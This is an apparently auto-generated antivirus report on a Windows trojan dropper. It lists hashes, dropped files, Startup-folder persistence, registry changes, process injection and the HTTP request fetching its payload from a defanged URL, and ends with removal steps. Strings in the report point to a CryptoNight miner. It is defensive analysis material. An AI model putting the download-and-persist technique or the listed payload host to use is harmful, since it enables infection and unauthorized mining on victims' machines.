Gen.Variant.Zusy.227166_d56ed70992

by malwarelabrobot on June 25th, 2017 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Zusy.227166 (B) (Emsisoft), Gen:Variant.Zusy.227166 (AdAware), Trojan.MSIL.Bladabindi.2.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: d56ed70992d6690ff6065c059d40d80e
SHA1: 0b479fcc276436d1b222ffb99e0d6d88cb9760f8
SHA256: e73efd8d4f78b745b11bc36917d75c5be17e6bcea355feb82d533a2aae411b5e
SSDeep: 768:ssZEZ2yaMtSl//8CChlie93EodO7zErpNaz2EzxRA7YVnbcuyD7UxbO:lZ4Boh8ll5/dUasRBVnouy8ZO
Size: 36352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2017-01-19 10:33:43
Analyzed on: Windows7 SP1 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

csrs.exe:4072
WScript.exe:2192
%original file name%.exe:3544
wscript.exe:3860

The Trojan injects its code into the following process(es):

csrs.exe:3748

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process csrs.exe:4072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (796 bytes)
C:\ProgramData\Windows\csrs.exe (4099 bytes)
C:\ProgramData\Windows\svchost.vbs (1 bytes)

The Trojan deletes the following file(s):

C:\ProgramData\Windows\__tmp_rar_sfx_access_check_1487812 (0 bytes)

The process WScript.exe:2192 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\Windows\csrs.exe (49 bytes)

The process %original file name%.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\75AD.vbs (2 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\75AD.vbs (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\75AD.tmp (0 bytes)

The process wscript.exe:3860 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\csrs.exe (359033 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe (107047 bytes)

Registry activity

The process csrs.exe:4072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process WScript.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process %original file name%.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

The process wscript.exe:3860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "F0 F7 96 90 E3 EC D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\wscript_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "F0 F7 96 90 E3 EC D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5	File path
e3427d9f439aebefa3d9c299e2a94af3	c:\ProgramData\Windows\csrs.exe
e3427d9f439aebefa3d9c299e2a94af3	c:\Users\All Users\Windows\csrs.exe
79c2c55f5c470f3412435ad68b93b375	c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe
79c2c55f5c470f3412435ad68b93b375	c:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\csrs.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	57344	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	61440	36864	33792	5.49689	cbf4cd52e66e5b1af4ea499b606da007
.rsrc	98304	4096	2048	2.92139	420f06aa722f4cde48ef1da1872e661c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://bigmir.biz.ua/uop/csrs.exe
teredo.ipv6.microsoft.com	157.56.120.207
dns.msftncsi.com	131.107.255.255

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /uop/csrs.exe HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: bigmir.biz.ua

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sat, 24 Jun 2017 12:15:27 GMT

Content-Type: application/x-msdownload

Content-Length: 1662744

Connection: keep-alive

Last-Modified: Sat, 15 Apr 2017 22:22:00 GMT

ETag: "195f18-54d3bfca1415a"

Accept-Ranges: bytes

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........?...QN..QN
..QN...N..QN...N-.QN...N..QN..PNN.QN...N..QN...N..QN...N..QN...N..QNRi
ch..QN........PE..L....ALV..........................................@.
.........................p..........................................3.
..T........ ..xE......................................................
........@............................................text...T.........
.................. ..`.rdata...P.......R..................@..@.data...
(...........................@....rsrc...xE... ...F..................@.
.@....................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................B..>...QV...u....8..
.E......o.....l-...E...`......"...E...Q..........E...8N...M...N@.,N...
M.^d........3..|$..rJ.L$..9RuA.|$..r:.y.au4.y.ru..y.!u(.y..u".y..u..I.
..u.j......u.j......u.j.X.....j...L.....H....P..U....\....t..E...@....
E...P....u..E.....E...E.]....D$.V...F..N.;N.v_.F.SUW..5C...t.;.v.Ph .B
.U..R.........R...F.......D. .N...;.w...S.6.......YY..u....dR...>_]
.^.[^...V...L$......P..F..V...^.........j..p..p..R...D$.V...F..N.;N.v`
.F.SUW..5C...t.;.v.Ph .B.U.PR.........Q...F..~.......D. ;.w.....?P

<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

WScript.exe_2192:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

msvcrt.dll

OLEAUT32.dll

ole32.dll

VERSION.dll

Hw2.Hw3;Jw_

advapi32.dll

wscript.exe

kernel32.dll

%s%s.DLL

wintrust.dll

%d.%d

Invalid parameter passed to C runtime function.

SOFTWARE\Classes\%s\%s

0x%8X

CreateURLMonikerEx

urlmon.dll

@@8X%u

RegCreateKeyA

RegCloseKey

RegOpenKeyA

RegDeleteKeyA

RegCreateKeyExW

RegCreateKeyExA

RegOpenKeyExW

ReportEventW

RegEnumKeyExA

RegOpenKeyExA

GetProcessHeap

GetCPInfo

MsgWaitForMultipleObjects

EnumThreadWindows

wscript.pdb

stdole2.tlbWWW

.ObjectWW

KeyW

WindowsFolderWWW4

%CopyFolderWWL

Windows Script Host (Ver 5.6)W)

Windows Script Host Application InterfaceW%

Windows Script Host Object

ebstrCmdLineW

1.191>1[1

: :$:(:,:0:4:8:<:

Software\Microsoft\Windows Script Host\Settings

Windows Script Host

WScript.CreateObject

WSHRemote.Execute

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}

.\%s.mui

.\%s\%s.mui

%s\%s.mui

%s\%s\%s.mui

%s\%s

Windows Based Script Host

5.8.7600.16385

Windows Script Host

(Windows Script Host (debugging disabled)

Windows Script Host Error

Windows Script Host Input Error

This Unicode version of Windows Script Host will only execute under Windows NT.

Please use the ANSI version of Windows Script Host."

WScript execution time was exceeded on script "%1!ls!".

Script execution was terminated.1Could not locate automation class named "%1!ls!".

Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).

Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.<Attempt to execute Windows Script Host while it is disabled.SAttempt to execute Windows Script Host remotely while remote execution is disabled.

Missing job name.*Unicode is not supported on this platform.

<The Windows Script Host settings have been reset to default.

Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.

Win32 Error 0x%X

Windows Script Host(Windows Script Host (debugging disabled)

Usage: WScript scriptname.extension [option...] [arguments...]

Use engine for executing script

Changes the default script host to CScript.exe

Changes the default script host to WScript.exe (default)

Prevent logo display: No banner will be shown at execution time

#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.

%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

csrs.exe_3748:

.text

`.rdata

@.data

.vmp0

.vmp1

.reloc

@.rsrc

X?.Eoe

lKi.mA

(.VI~e

H.mBz]6<

.ILmx

o:\L|

N.vDc

.rP 4&P

D%U4y

%f?]5

11D1

434~4&585

3 3$3(3,30343

7|7r7

7|7R7a7

9 9$9(9,90949~9

<"=1=9=?=

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

1 1$1(1,1014181<1

; ;$;(;,;

8(8,80848

0S091K1h1

0 0$0(0,0

W-.GE;

w.Su7

%c"c5

@?>=<;:9

87654321

0/.-, *)

('&%$#"!

}|Xd.rd

4f.lU

S0.LY

!CTa

h%S)Jy

=f.lz?

6*Á

F.SZT}

.zmH`

.Xm0_

d^%c.

I.DJw

?a.PuC"

,K.Bys

Z.Egh

.ITgt=

%Uv@u

eo.qe

,.UW434

%Dxwq

2:.xCO

Y3.LZ

-.LR$

\Sý

R.wf4

{v.xd

.XF8J

.yKgc

3Âm

BsQl|

-FLt}E

@.zSV

b8A%c

}.qTa

i:\O0N 2lw

jÄEm

t%Un{

qL%Ct

[%uo$

.pjXc%

<:86420.

WS2_32.dll

EnumChildWindows

CRt*u

.Wi|W

%cZy y

?>=<;:98

76543210

/.-, *)(

\.DDp(T

2bP%X

p.uDxi

USER32.dll

ADVAPI32.dll

F%u~M<

KERNEL32.dll

user32.dll

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

conhost.exe_3276:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

csrs.exe:4072
WScript.exe:2192
%original file name%.exe:3544
wscript.exe:3860
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk (796 bytes)
C:\ProgramData\Windows\csrs.exe (4099 bytes)
C:\ProgramData\Windows\svchost.vbs (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\75AD.vbs (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\759C.tmp\csrs.exe (359033 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\csrs[1].exe (107047 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Zusy.227166_d56ed70992

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Zusy.227166_d56ed70992

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet